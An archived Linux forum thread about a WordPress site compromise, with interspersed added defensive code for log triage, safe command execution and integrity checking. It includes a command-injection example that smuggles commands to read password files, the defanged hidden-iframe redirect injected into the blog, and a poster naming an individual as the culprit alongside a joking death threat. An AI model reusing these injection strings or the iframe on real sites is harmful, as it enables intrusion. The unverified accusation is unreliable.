Serious security breach on Developer Blog

News, happenings
BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia

Serious security breach on Developer Blog

#1 Post by BarryK »

I went to my blog this morning and got redirected to another site. My PC became very busy, mouse response extremely slow. I managed to kill SeaMonkey.

I FTP'd to my site and found that two files, blog/index.php and blog/wp-blog-header.php have been modified. I have restored the originals.

The big question is, how could someone do that?

I have raised a ticket with servage and asked them that question.

Note, I've turned off comments on my blog, but there were no suspicious comments anyway.
[url]https://bkhome.org/news/[/url]

veronicathecow
Posts: 559
Joined: Sat 21 Oct 2006, 09:41

#2 Post by veronicathecow »

Hi Barry, sorry to hear of this problem. My first thought was: "Any chance that your machine has been compromised?" Secondly, perhaps it's time to see if there is a need to tighten up Puppy security? (It may have been on the server from their side, but it looks as though it was making a good stab at taking over your PC.)
Perhaps now that things like the Asus eeePC are getting sold in volume and Firefox is becoming more powerful, the forces of darkness will be taking a deeper interest in open source.
Cheers
Tony

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#3 Post by John Doe »

I just PM'd this to Barry, before I noticed the thread here.

You're all welcome to read it.

Regarding the page change:

Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
http://seclists.org/fulldisclosure/2007/Nov/0336.html

Regarding the one comment that got through the other day: I had signed up to post what follows this link. In the meantime I did some further research and found it was probably SQL injection.

Wordpress 2.3.1 Charset SQL Injection Vulnerability
http://blogsecurity.net/wordpress/wordp ... erability/

---

Your security implementation is probably adequate. There are three methods which could be used to create such spam that came to mind when I read your post.

1. An exploit in the WordPress code to bypass the security layers. If you examine your HTTP logs for the request that created the comment, it might tell you if this was the method used. It would also allow you to notify the WordPress creators so they could fix the problem. You could gather, at a minimum, the page that was used to implement the exploit. If a 'get' post was used, you might be able to further identify the query string, which would help the coders diagnose the problem faster.

2. A server-level database permission issue that allowed another user or site on the same server to insert an entry directly into your database. This would be impractical for spammers, as they would have to pay for accounts on lots of servers and hope a majority of the admins had a weak understanding of security.

3. An SQL injection vulnerability in the registration form, the login form or the search form. The login form and search form queries shouldn't use a user that has insert permissions anyway, so maybe the registration form. This would depend on what permissions to which tables the user account that it queried as was given. If that user doesn't have permission to insert into the comment table in the database, it's not this.
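The log check suggested in method 1, worked through as an added example (not code from the original post): it walks Apache "combined" access-log lines, pulls out comment submissions and query strings that carry quote characters or SQL keywords, and prints the fields a bug report would need. The log lines are constructed; wp-comments-post.php is the endpoint WordPress comment forms submit to, and the function names are assumptions.

```php
<?php
// Added example, not from the original post: triage of an Apache "combined"
// access log for the request that created a comment. The log lines below are
// constructed; wp-comments-post.php is the endpoint WordPress comment forms
// submit to. Requires PHP 8 (str_ends_with).

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [10/Jan/2008:03:14:07 +0000] "GET /blog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2008:03:14:09 +0000] "POST /blog/wp-comments-post.php HTTP/1.1" 302 0 "http://bkhome.org/blog/" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2008:03:15:00 +0000] "GET /blog/?s=%27%20OR%201%3D1--%20 HTTP/1.0" 200 3072 "-" "-"
192.0.2.9 - - [10/Jan/2008:03:16:21 +0000] "GET /blog/index.php?cat=3 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
LOG;

// Split one combined-format line into its fields; null if it does not parse.
function parse_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $url = parse_url($m[4]);
    return [
        'ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
        'path' => $url['path'] ?? $m[4],
        'query' => urldecode($url['query'] ?? ''),
        'status' => (int) $m[5], 'referer' => $m[6], 'agent' => $m[7],
    ];
}

// Worth a closer look: any comment submission, or a decoded query string that
// carries quote characters or common SQL keywords (the injection case).
function interesting(array $r): bool
{
    if (str_ends_with($r['path'], '/wp-comments-post.php')) {
        return true;
    }
    return preg_match('/[\'";]|\b(union|select|or\s+1=1)\b/i', $r['query']) === 1;
}

foreach (explode("\n", SAMPLE_LOG) as $line) {
    $r = parse_line($line);
    if ($r !== null && interesting($r)) {
        printf("%s %s %s %s query=[%s] agent=[%s]\n",
            $r['time'], $r['ip'], $r['method'], $r['path'], $r['query'], $r['agent']);
    }
}
```

On a real log, replace SAMPLE_LOG with the contents of the access log for the timestamp of the comment, and keep the matching lines (source IP, exact path and decoded query) for the report to the WordPress developers.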

MU
Posts: 13649
Joined: Wed 24 Aug 2005, 16:52
Location: Karlsruhe, Germany

#4 Post by MU »

I had a comparable problem not long ago.
Using gFTP I could see that the problem came from a newsletter module of, I think, phpBB.
It seems that a weak point was used to install a spam mailer.
You could see it by analyzing how the folders around it got infected by new PHP-Scripts.

One concrete example:

if you have such code:
$thecommand = $_GET["whatnext"];
system($thecommand);

So you would call a website like this:
http://xyt.com/index.php?whatnext=ls

Then the string "ls" would be passed to index.php, where it is executed by "system".
Now the attack would be to pass your own string, like:
http://xyt.com/index.php?whatnext=ls;cd;cd ..;cd ..;cd etc;cat passwords

You might have to replace some chars with HTML-entities like %20 instead of spaces.
This is a very obvious vulnerability; there are more advanced ones, as John Doe said.

And software IS buggy.
We had the example of a commercial board system where you registered as a new user with restrictions, and then, until you logged in to your account, had access to all boards, even those that are usually only viewable by administrators.

Mark
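
The pattern Mark describes, shown as an added example (not code from the original post) with the vulnerable lookup beside an allowlisted version; the parameter name "whatnext" comes from the post, while run_unsafe, run_safe and the action keys are assumptions.

```php
<?php
// Added example, not from the original post. The parameter name "whatnext"
// comes from the post; run_unsafe/run_safe and the action keys are assumptions.

// VULNERABLE: the raw query-string value becomes the shell command line,
// so a value such as "ls;cat /etc/passwd" is executed exactly as supplied.
function run_unsafe(array $query): string
{
    $thecommand = $query["whatnext"] ?? "";
    return (string) shell_exec($thecommand);
}

// HARDENED: the client may only choose a key; the command text is fixed
// server-side, so shell metacharacters in the parameter never reach the shell.
const ALLOWED_ACTIONS = [
    "list"   => "ls -l",
    "uptime" => "uptime",
];

function run_safe(array $query): string
{
    $action = $query["whatnext"] ?? "";
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        return "rejected: unknown action";
    }
    // If a user-supplied argument were genuinely needed, pass it through
    // escapeshellarg() instead of concatenating it into the command string.
    return (string) shell_exec(ALLOWED_ACTIONS[$action]);
}

// The two URLs from the post, reduced to their decoded query parameters.
parse_str("whatnext=ls", $benign);
parse_str("whatnext=ls;cd;cd%20..;cat%20passwords", $hostile);

echo run_safe($benign), "\n";                    // rejected: "ls" is not an allowlisted key
echo run_safe($hostile), "\n";                   // rejected: the appended commands never run
echo run_safe(["whatnext" => "uptime"]), "\n";   // runs the fixed "uptime" command only
```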

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia

#5 Post by BarryK »

Looking around my site with gFTP, I quickly discovered that my entire site had been hacked.

This covers goosee.com as well as puppylinux.com, each in its own subdirectory.

I contacted servage, they replied that I should change my password, and make sure that all directories are 755, and all files 644.

So, I went through, making sure all permissions are okay, uploading the original files when I found a hacked one. But, the thing is, static html pages in 755 directory with 644 permission were also hacked.

I did have a lot of html files with 755, and I did notice a preference by the hacker to hack those. But it doesn't explain how 644 files got hacked. I've sent a message to servage asking how that could happen.

Right now, I'm nervously watching my site to see if anything more happens to it.

There seem to be two different types of hack, one that occurred on Jan 10th, which has injected porno links into some pages. Then the one that I found, a massive hack of my site on Jan 12th, which has inserted redirection code. I'll put the site that I got redirected to, but don't go there!!! Maybe someone can work out what this site does or attempts to do. This is my hacked blog/index.php, but I have inserted some capitalisation to disable it:


<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-headerDOTphp');
?><iframe src="httpCOLON//orentraffDOTcn/tdsbear/indexDOTphp?out=1199657524" width="0" height="0" style="display:none"></iframe>
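
An integrity check of the kind that would have flagged the modified index.php above, added here as an example (not code from the original post or from WordPress): it compares a live tree against sha256 sums taken from a clean copy and also looks for the zero-sized hidden iframe, which catches injected files even where no clean copy exists. The directory paths, function names and sample files are constructed for the demo.

```php
<?php
// Added example, not from the original post: compare a live site tree against
// sha256 sums from a clean copy, and grep for the 0x0 hidden iframe seen in
// the thread. Paths, function names and sample files are constructed.

// sha256 of every file under $root, keyed by path relative to $root.
function build_manifest(string $root): array
{
    $sums = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        $rel = substr($file->getPathname(), strlen($root) + 1);
        $sums[$rel] = hash_file('sha256', $file->getPathname());
    }
    return $sums;
}

// The injection seen in the thread: an iframe sized to nothing or hidden by CSS.
function looks_injected(string $content): bool
{
    return preg_match('/<iframe[^>]*(width="0"|height="0"|display\s*:\s*none)/i', $content) === 1;
}

// Report files that are new, changed against the manifest, or carry the pattern.
function audit(string $live, array $manifest): array
{
    $findings = [];
    foreach (build_manifest($live) as $rel => $sum) {
        if (!isset($manifest[$rel])) {
            $findings[$rel] = 'new file';
        } elseif ($manifest[$rel] !== $sum) {
            $findings[$rel] = 'modified';
        }
        if (looks_injected(file_get_contents("$live/$rel"))) {
            $findings[$rel] = ($findings[$rel] ?? 'hash unchanged') . ', hidden iframe';
        }
    }
    return $findings;
}

// Constructed demo: a clean blog/index.php next to a copy with an iframe appended.
$tmp = sys_get_temp_dir() . '/audit-demo';
@mkdir("$tmp/clean/blog", 0755, true); @mkdir("$tmp/live/blog", 0755, true);
$clean = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n?>";
file_put_contents("$tmp/clean/blog/index.php", $clean);
file_put_contents("$tmp/live/blog/index.php",
    $clean . '<iframe src="http://ATTACKER-PLACEHOLDER.invalid/x" width="0" height="0" style="display:none"></iframe>');
print_r(audit("$tmp/live", build_manifest("$tmp/clean")));
```

Run against the real site, the "hash unchanged, hidden iframe" case is the one to watch for: it means the clean copy itself carries the injection and a fresh download of WordPress should be used as the baseline instead.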

wingruntled

#6 Post by wingruntled »

Barry
Not to sound like an idiot, but this is old news.
You were hacked last year but never got the message.
http://murga-linux.com/puppy/viewtopic.php?t=23724

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#7 Post by John Doe »

I got the name of who is responsible already.

Mahmod AbdAllah el Gashmi

He lives in Turkey. Just say the word Barry and I'll have him killed. 8)

He's mentioned on this page:
http://spamtrackers.eu/wiki/index.php?t ... acked_host

I'll post how I figured that out in a bit. I have to go get my nightly brew.

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#8 Post by Caneri »

Well..it looks like puppylinux.ca is also down.

My IP address will not resolve to my domain.

My tech guys are working on this problem, but it may be tomorrow before I get an answer.

Sorry all.

Eric
Be not afraid to grow slowly, only be afraid of standing still. (Chinese proverb)

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#9 Post by John Doe »

Ok, I used wget to request the url Barry posted without using the query string and got a simple file that looks like a login form (it's attached as index.php.txt).

Then I used wget to request the url with the query string and got the following pertinent information (the whole dialog is attached as wget-response.txt):

HTTP request sent, awaiting response... 302 Found
Location: httpCOLON//88.255.94.114/~usersonli/oren/indexDOTphp [following]
Connecting to 88.255.94.114:80... failed: Bad file descriptor.

Using the ip address I looked up the owner via whois.ripe.net. It's that guy I mentioned above (info in whois.ripe.net.txt).

The most interesting part was "Bad file descriptor", that's why your browser froze up. I'm assuming it's some sort of exploit for IE that installs his root kit, which is mentioned at the following post:
http://www.bluetack.co.uk/forums/index. ... entry85109

What a piece of trash. :evil:
files.tar
Text Files are in the TarBall

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#10 Post by Caneri »

I'm not sure if this is related or not.

http://www.internetnews.com/security/ar ... hp/3712071

Eric

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#11 Post by John Doe »

Caneri wrote: I'm not sure if this is related or not.
it's all related somehow :)

cool read, thanks for the link (hopefully it wasn't one of them :!: )

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia

#12 Post by BarryK »

Okay, if it's an exploit for IE, then it's likely not targeting Linux and wouldn't have compromised my PC...

Anyway, I think I know how my site was violated. Well, not really 'how', just the basic outline.

My site has had two violations, one dated Jan 10, the second on Jan 12. Well, you might have seen my recent blog post "The spam that got through" - that was Jan 10. Then, last night - Jan 12 - there was another one. That's two of them, corresponding with my site violations.

So, my confidence in WordPress has hit rock bottom. Even if I do upgrade, it seems to be a never ending battle. I've turned off comments - and 'flagman' posted a comment immediately after! Globally turning off comments only affects new posts! Yikes, I hunted through the prefs and there's nothing to globally turn off comments!!!

So, I used the "bad words" filter to block everything - how crude.

Previously known as Guest
Posts: 240
Joined: Thu 29 Sep 2005, 00:39

#13 Post by Previously known as Guest »

As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.

Lobster
Official Crustacean
Posts: 15522
Joined: Wed 04 May 2005, 06:06
Location: Paradox Realm

#14 Post by Lobster »

:(

I have a Wordpress blog (rarely post to it)
Had to turn off the comments due to corrective medication for penile dysfunction and porn spam
http://tmxxine.com/wordpress/

corrective medication for penile dysfunction = via***
I can not use the word via*** as Johns efforts to fight the mal merchants changes the word to "poisonous crap"

Look how hard John and Flash work to stop spam
(and it still gets through . . . )

It makes sense for spammers to code bots for popular services
and Wordpress is the top blogging tool.
http://www.honeynet.org/papers/bots/botnet-code.html

We have the word "Puppy" come up with Puppy Linux in Google
Therefore owning that or hijacking it is a commercial decision.

An attack is inconvenient, annoying and also can make one paranoid
(as if it is a personal attack) :?

It is important to maintain ones psychological perspective
when this sort of situation occurs
(I am occasionally sane enough to recognise that) :shock:

So far the solution seems right:
1. Exposing and dealing with the situation
2. Notifying and working with the software and server providers
When the Puppy wiki was attacked with spam bots
rather than change to new software
Raffy hardened the existing software
and even though users have to register
many did and some regular users are making
many useful contributions :)

Related to spam is the use of gmail to filter
(not ideal but no solution is)

Just remember there is a protective cordon of expertise
around Puppy. How this situation is dealt with is indicative
of a growing maturity. Do we stay in place and fight our corner
or run to a new solution
(with attendant problems)?

Good luck. 8)
Puppy Raspup 8.2Final 8)
Puppy Links Page http://www.smokey01.com/bruceb/puppy.html :D

Previously known as Guest
Posts: 240
Joined: Thu 29 Sep 2005, 00:39

#15 Post by Previously known as Guest »

Previously known as Guest wrote: As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.
Interestingly within a few minutes of this post an attack started from:
84.221.65.76 [host-84-221-65-76.cust-adsl.tiscali.it]
80.186.120.215 [a80-186-120-215.elisa-laajakaista.fi]

Maybe I'll start posting the fscking IPs involved again! I could write a novel of IP addresses. :shock:

Sage
Posts: 5536
Joined: Tue 04 Oct 2005, 08:34
Location: GB

#16 Post by Sage »

No respite, either:
http://www.theregister.co.uk/2008/01/11 ... infection/
This is looking like a battle of intellects.

dvw86
Posts: 636
Joined: Thu 05 May 2005, 00:55
Location: Washington State

#17 Post by dvw86 »

Barry,
You may want to read this blog post by Arnold Kim.
http://normalkid.com/2007/11/20/
Arnold (Arn) is the creator of macrumors.com. It is a very popular rumor and news site focusing on the Apple computer company. He has had many similar issues with PHP-based sites, including WordPress. His final solution was to use vBulletin, which he has been happy with. Some samples of his posts regarding WordPress include the following.
Wordpress Sucks, and Other Thoughts (Including Why I’m on Default Theme)
The problem was that there were known exploits in every version… and it was like holding up a sign to anyone out there to “Please Hack Me

prehistoric
Posts: 1744
Joined: Tue 23 Oct 2007, 17:34

adding insult to injury

#18 Post by prehistoric »

@John Doe,

When I tried to notify a friend (a retired sysadmin) about that European site, his ISP identified the message as spam or a virus. This was a short, hand-typed, text-only message with no attachments. (I suppose I should have used a sophisticated method of hiding content, like ROT13.)

When the message bounced I got a message from my ISP advising me I had sent contaminated mail and to tell their Postmaster if there had been an error. When I did as requested, that message was also rejected because the Postmaster mail box was full.

I think I finally got the message through by splitting the offending text and telling the recipient how to reassemble it. (Wait, let me check for another bounce.)

Aren't ISPs helpful in these situations?

prehistoric

willhunt
Posts: 495
Joined: Wed 05 Oct 2005, 18:19

#19 Post by willhunt »

How do I ban this IP so my machine won't even go to that IP?
[url=http://hostfile.org/icepak.pet]176 Icewm Themes :!:[/url]
[url=http://tinyurl.com/39fl3x]vlc-0.8.6c-i586.pet[/url]
[url=http://tinyurl.com/2q7cbp]vlc-0.8.6c-i586.pet[/url]

wingruntled

#20 Post by wingruntled »

willhunt
You could add the host names of the IP addresses to your /etc/hosts file.
Just add the two lines below to the END of your hosts file, after the existing line:

127.0.0.1 localhost puppypc


127.0.0.1  host-84-221-65-76.cust-adsl.tiscali.it
127.0.0.1  a80-186-120-215.elisa-laajakaista.fi
